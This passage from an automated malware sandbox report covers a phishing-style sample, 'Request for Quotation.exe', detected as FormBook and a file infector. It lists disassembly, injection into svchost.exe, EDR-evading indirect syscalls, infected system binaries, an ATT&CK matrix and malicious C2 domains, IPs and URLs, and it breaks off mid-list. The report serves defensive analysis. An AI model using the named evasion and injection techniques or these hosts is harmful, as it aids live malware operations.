          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353973A mov eax, dword ptr fs:[00000030h]19_2_0353973A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356273C mov eax, dword ptr fs:[00000030h]19_2_0356273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356273C mov ecx, dword ptr fs:[00000030h]19_2_0356273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356273C mov eax, dword ptr fs:[00000030h]19_2_0356273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AC730 mov eax, dword ptr fs:[00000030h]19_2_035AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EF72E mov eax, dword ptr fs:[00000030h]19_2_035EF72E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03533720 mov eax, dword ptr fs:[00000030h]19_2_03533720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354F720 mov eax, dword ptr fs:[00000030h]19_2_0354F720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354F720 mov eax, dword ptr fs:[00000030h]19_2_0354F720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354F720 mov eax, dword ptr fs:[00000030h]19_2_0354F720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F972B mov eax, dword ptr fs:[00000030h]19_2_035F972B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356C720 mov eax, dword ptr fs:[00000030h]19_2_0356C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356C720 mov eax, dword ptr fs:[00000030h]19_2_0356C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353C7C0 mov eax, dword ptr fs:[00000030h]19_2_0353C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035357C0 mov eax, dword ptr fs:[00000030h]19_2_035357C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035357C0 mov eax, dword ptr fs:[00000030h]19_2_035357C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035357C0 mov eax, dword ptr fs:[00000030h]19_2_035357C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B07C3 mov eax, dword ptr fs:[00000030h]19_2_035B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035347FB mov eax, dword ptr fs:[00000030h]19_2_035347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035347FB mov eax, dword ptr fs:[00000030h]19_2_035347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353D7E0 mov ecx, dword ptr fs:[00000030h]19_2_0353D7E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035527ED mov eax, dword ptr fs:[00000030h]19_2_035527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035527ED mov eax, dword ptr fs:[00000030h]19_2_035527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035527ED mov eax, dword ptr fs:[00000030h]19_2_035527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EF78A mov eax, dword ptr fs:[00000030h]19_2_035EF78A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_036037B6 mov eax, dword ptr fs:[00000030h]19_2_036037B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355D7B0 mov eax, dword ptr fs:[00000030h]19_2_0355D7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]19_2_0352F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]19_2_0352F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]19_2_0352F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]19_2_0352F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]19_2_0352F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]19_2_0352F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]19_2_0352F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]19_2_0352F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F7BA mov eax, dword ptr fs:[00000030h]19_2_0352F7BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B97A9 mov eax, dword ptr fs:[00000030h]19_2_035B97A9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035BF7AF mov eax, dword ptr fs:[00000030h]19_2_035BF7AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035BF7AF mov eax, dword ptr fs:[00000030h]19_2_035BF7AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035BF7AF mov eax, dword ptr fs:[00000030h]19_2_035BF7AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035BF7AF mov eax, dword ptr fs:[00000030h]19_2_035BF7AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035BF7AF mov eax, dword ptr fs:[00000030h]19_2_035BF7AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035307AF mov eax, dword ptr fs:[00000030h]19_2_035307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354C640 mov eax, dword ptr fs:[00000030h]19_2_0354C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03562674 mov eax, dword ptr fs:[00000030h]19_2_03562674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F866E mov eax, dword ptr fs:[00000030h]19_2_035F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F866E mov eax, dword ptr fs:[00000030h]19_2_035F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356A660 mov eax, dword ptr fs:[00000030h]19_2_0356A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356A660 mov eax, dword ptr fs:[00000030h]19_2_0356A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03569660 mov eax, dword ptr fs:[00000030h]19_2_03569660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03569660 mov eax, dword ptr fs:[00000030h]19_2_03569660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03533616 mov eax, dword ptr fs:[00000030h]19_2_03533616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03533616 mov eax, dword ptr fs:[00000030h]19_2_03533616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572619 mov eax, dword ptr fs:[00000030h]19_2_03572619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03561607 mov eax, dword ptr fs:[00000030h]19_2_03561607
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AE609 mov eax, dword ptr fs:[00000030h]19_2_035AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356F603 mov eax, dword ptr fs:[00000030h]19_2_0356F603
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03605636 mov eax, dword ptr fs:[00000030h]19_2_03605636
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]19_2_0354260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]19_2_0354260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]19_2_0354260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]19_2_0354260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]19_2_0354260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]19_2_0354260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354260B mov eax, dword ptr fs:[00000030h]19_2_0354260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354E627 mov eax, dword ptr fs:[00000030h]19_2_0354E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]19_2_0352F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]19_2_0352F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]19_2_0352F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]19_2_0352F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]19_2_0352F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]19_2_0352F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]19_2_0352F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]19_2_0352F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F626 mov eax, dword ptr fs:[00000030h]19_2_0352F626
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03566620 mov eax, dword ptr fs:[00000030h]19_2_03566620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03568620 mov eax, dword ptr fs:[00000030h]19_2_03568620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353262C mov eax, dword ptr fs:[00000030h]19_2_0353262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]19_2_0356A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356A6C7 mov eax, dword ptr fs:[00000030h]19_2_0356A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353B6C0 mov eax, dword ptr fs:[00000030h]19_2_0353B6C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353B6C0 mov eax, dword ptr fs:[00000030h]19_2_0353B6C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353B6C0 mov eax, dword ptr fs:[00000030h]19_2_0353B6C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353B6C0 mov eax, dword ptr fs:[00000030h]19_2_0353B6C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353B6C0 mov eax, dword ptr fs:[00000030h]19_2_0353B6C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353B6C0 mov eax, dword ptr fs:[00000030h]19_2_0353B6C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F16CC mov eax, dword ptr fs:[00000030h]19_2_035F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F16CC mov eax, dword ptr fs:[00000030h]19_2_035F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F16CC mov eax, dword ptr fs:[00000030h]19_2_035F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F16CC mov eax, dword ptr fs:[00000030h]19_2_035F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EF6C7 mov eax, dword ptr fs:[00000030h]19_2_035EF6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035616CF mov eax, dword ptr fs:[00000030h]19_2_035616CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AE6F2 mov eax, dword ptr fs:[00000030h]19_2_035AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AE6F2 mov eax, dword ptr fs:[00000030h]19_2_035AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AE6F2 mov eax, dword ptr fs:[00000030h]19_2_035AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AE6F2 mov eax, dword ptr fs:[00000030h]19_2_035AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B06F1 mov eax, dword ptr fs:[00000030h]19_2_035B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B06F1 mov eax, dword ptr fs:[00000030h]19_2_035B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035ED6F0 mov eax, dword ptr fs:[00000030h]19_2_035ED6F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C36EE mov eax, dword ptr fs:[00000030h]19_2_035C36EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C36EE mov eax, dword ptr fs:[00000030h]19_2_035C36EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C36EE mov eax, dword ptr fs:[00000030h]19_2_035C36EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C36EE mov eax, dword ptr fs:[00000030h]19_2_035C36EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C36EE mov eax, dword ptr fs:[00000030h]19_2_035C36EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C36EE mov eax, dword ptr fs:[00000030h]19_2_035C36EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355D6E0 mov eax, dword ptr fs:[00000030h]19_2_0355D6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355D6E0 mov eax, dword ptr fs:[00000030h]19_2_0355D6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03534690 mov eax, dword ptr fs:[00000030h]19_2_03534690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03534690 mov eax, dword ptr fs:[00000030h]19_2_03534690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B368C mov eax, dword ptr fs:[00000030h]19_2_035B368C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B368C mov eax, dword ptr fs:[00000030h]19_2_035B368C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B368C mov eax, dword ptr fs:[00000030h]19_2_035B368C
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_007A1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_007A1361
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_007A4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_007A4C7B

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9BJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9FJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Request for Quotation.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\Request for Quotation.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B07008Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Request for Quotation.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00788550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,14_2_00788550
          Source: Request for Quotation.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: C:\Users\user\Desktop\Request for Quotation.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST5FFB.tmp VolumeInformationJump to behavior
          Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST600C.tmp VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C50080 VirtualFree,VirtualFree,VirtualAlloc,GetUserNameW,GetComputerNameW,GetComputerNameW,6_2_00C50080

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 19.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.2017731706.0000000003310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 19.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.2017731706.0000000003310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Service Execution          		1
          Windows Service          		1
          Windows Service          		222
          Masquerading          		OS Credential Dumping231
          Security Software Discovery          		1
          Taint Shared Content          		1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Native API          		2
          LSASS Driver          		212
          Process Injection          		2
          Virtualization/Sandbox Evasion          		LSASS Memory2
          Virtualization/Sandbox Evasion          		Remote Desktop ProtocolData from Removable Media2
          Non-Application Layer Protocol          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		212
          Process Injection          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive12
          Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
          LSASS Driver          		1
          Deobfuscate/Decode Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		LSA Secrets1
          Account Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
          Obfuscated Files or Information          		Cached Domain Credentials1
          System Owner/User Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Software Packing          		DCSync111
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Timestomp          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          DLL Side-Loading          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572510 Sample: Request for Quotation.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 30 zlenh.biz 2->30 32 uhxqin.biz 2->32 34 4 other IPs or domains 2->34 40 Suricata IDS alerts for network traffic 2->40 42 Antivirus detection for dropped file 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 9 other signatures 2->46 7 Request for Quotation.exe 3 2->7         started        12 AppVClient.exe 1 2->12         started        14 Spectrum.exe 2 17 2->14         started        16 15 other processes 2->16 signatures3 process4 dnsIp5 36 ssbzmoy.biz 18.141.10.107, 49732, 49733, 49744 AMAZON-02US United States 7->36 38 pywolwnvd.biz 54.244.188.177, 49730, 49731, 49734 AMAZON-02US United States 7->38 20 C:\Windows\System32\snmptrap.exe, PE32+ 7->20 dropped 22 C:\Windows\System32\msiexec.exe, PE32+ 7->22 dropped 24 C:\Windows\System32\msdtc.exe, PE32+ 7->24 dropped 28 15 other malicious files 7->28 dropped 48 Binary is likely a compiled AutoIt script file 7->48 50 Writes to foreign memory regions 7->50 52 Maps a DLL or memory area into another process 7->52 64 2 other signatures 7->64 18 svchost.exe 7->18         started        26 C:\Windows\System32\...\398ce0ec3b45a4be.bin, COM 12->26 dropped 54 Antivirus detection for dropped file 12->54 56 Creates files in the system32 config directory 12->56 58 Machine Learning detection for dropped file 12->58 60 Contains functionality to behave differently if execute on a Russian/Kazak computer 14->60 62 Found direct / indirect Syscall (likely to bypass EDR) 16->62 file6 signatures7 process8

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Request for Quotation.exe82%ReversingLabsWin32.Virus.Expiro
          Request for Quotation.exe100%AviraW32/Infector.Gen
          Request for Quotation.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\Spectrum.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\snmptrap.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\msiexec.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\SensorDataService.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\AppVClient.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\msdtc.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\Locator.exe100%AviraW32/Infector.Gen
          C:\Windows\SysWOW64\perfhost.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\OpenSSH\ssh-agent.exe100%AviraW32/Infector.Gen
          C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe100%AviraW32/Infector.Gen
          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\FXSSVC.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe100%AviraW32/Infector.Gen
          C:\Windows\System32\alg.exe100%AviraW32/Infector.Gen
          C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe100%AviraW32/Infector.Gen
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe100%Joe Sandbox ML
          C:\Windows\System32\Spectrum.exe100%Joe Sandbox ML
          C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe100%Joe Sandbox ML
          C:\Windows\System32\snmptrap.exe100%Joe Sandbox ML
          C:\Windows\System32\msiexec.exe100%Joe Sandbox ML
          C:\Windows\System32\SensorDataService.exe100%Joe Sandbox ML
          C:\Windows\System32\AppVClient.exe100%Joe Sandbox ML
          C:\Windows\System32\msdtc.exe100%Joe Sandbox ML
          C:\Windows\System32\Locator.exe100%Joe Sandbox ML
          C:\Windows\SysWOW64\perfhost.exe100%Joe Sandbox ML
          C:\Windows\System32\OpenSSH\ssh-agent.exe100%Joe Sandbox ML
          C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe100%Joe Sandbox ML
          C:\Windows\System32\FXSSVC.exe100%Joe Sandbox ML
          C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe100%Joe Sandbox ML
          C:\Windows\System32\alg.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://54.244.188.177:80/miswwsapbqmsir&&$0%Avira URL Cloudsafe
          http://54.244.188.177/10%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ssbzmoy.biz
          		18.141.10.107
          		truefalse
            		high
            fwiwk.biz
            		172.234.222.138
            		truefalse
              		high
              pywolwnvd.biz
              		54.244.188.177
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://vcddkls.biz/ytpebbldheutaofalse
                  		high
                  http://pywolwnvd.biz/hcwjealfbuyfalse
                    		high
                    http://pywolwnvd.biz/miswwsapbqmsirfalse
                      		high
                      http://ssbzmoy.biz/krfalse
                        		high
                        http://cvgrf.biz/iropyruplkanfalse
                          		high
                          http://knjghuig.biz/hgpugagvcfalse
                            		high
                            http://ssbzmoy.biz/njrvfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://54.244.188.177:80/miswwsapbqmsir&&$Request for Quotation.exe, 00000000.00000003.1739856220.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759386922.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1748580757.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744146667.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1758403499.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1747429848.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1741441665.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744762476.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1741023686.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743658598.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1746039694.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 